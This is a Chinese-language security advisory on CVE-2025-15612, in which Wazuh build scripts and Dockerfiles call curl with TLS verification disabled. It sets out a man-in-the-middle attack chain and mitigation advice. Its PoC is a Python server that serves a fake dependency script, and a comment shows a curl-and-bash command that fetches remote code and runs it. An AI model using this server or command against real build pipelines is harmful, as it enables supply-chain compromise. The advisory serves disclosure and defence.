IPBUF安全漏洞报告
English
CVE-2025-15612 CVSS 4.8 中危

CVE-2025-15612 Wazuh不安全传输致RCE漏洞

披露日期: 2026-03-27

漏洞信息

漏洞编号
CVE-2025-15612
漏洞类型
远程代码执行
CVSS评分
4.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Wazuh

相关标签

RCE供应链攻击中间人攻击WazuhMITM

漏洞概述

Wazuh的预配置脚本及Dockerfile中存在不安全传输漏洞。问题源于脚本在调用curl下载资源时使用了-k/--insecure参数,导致SSL/TLS证书验证被禁用。攻击者若具备网络访问能力,可实施中间人攻击,拦截并篡改构建过程中下载的依赖项或代码。此行为可能导致远程代码执行,进而造成供应链攻击风险。

技术细节

该漏洞的根本原因在于Wazuh的构建基础设施(包括预配置脚本和Dockerfile)在依赖网络资源时未严格验证服务器的身份。具体而言,开发人员在curl命令中使用了-k或--insecure选项,这会跳过对SSL/TLS证书链的验证。在CI/CD或容器构建过程中,当脚本尝试从远程仓库拉取代码或依赖包时,攻击者可以通过ARP欺骗、DNS劫持或控制网络网关等方式进行中间人攻击。由于客户端不校验证书,攻击者可以向受害者返回恶意构造的安装包或脚本。一旦这些恶意文件被构建系统执行,攻击者即可在构建环境或最终生成的镜像中获得远程代码执行权限,从而污染整个软件供应链。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用Wazuh且其构建流程包含使用curl -k下载资源的步骤。
STEP 2
定位
攻击者定位到网络流量中可被拦截的位置,或通过DNS劫持准备欺骗流量。
STEP 3
拦截与篡改
利用MITM攻击,拦截构建过程中的下载请求,并返回包含恶意代码的伪造文件。
STEP 4
执行
受害者的Dockerfile或脚本下载并执行了被篡改的文件,触发远程代码执行。
STEP 5
维持与影响
攻击者控制了构建环境,将后门植入最终镜像,实现供应链持久化。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC: Demonstration of MITM vulnerability when using curl -k # Attacker sets up a malicious server to replace legitimate dependencies import http.server import socketserver POC_PAYLOAD = b'#!/bin/bash\necho "RCE via MITM during build"' class MaliciousHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Send malicious payload pretending to be a legitimate dependency self.send_response(200) self.send_header('Content-type', 'application/octet-stream') self.end_headers() self.wfile.write(POC_PAYLOAD) # Usage: Run this script on the attacker's machine and spoof the target URL's DNS PORT = 80 with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd: print(f"Malicious server running at port {PORT}") httpd.serve_forever() # Victim vulnerable command: curl -k http://target-url/dependency.sh -o dependency.sh && bash dependency.sh

影响范围

Wazuh (Provisioning Scripts & Dockerfiles)

防御指南

临时缓解措施
建议立即审查所有Wazuh相关的Dockerfile和自动化部署脚本,移除禁用SSL验证的curl参数。在无法立即修改代码的情况下,应确保构建网络环境的隔离性,防止外部MITM攻击,并手动校验关键依赖文件的完整性。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表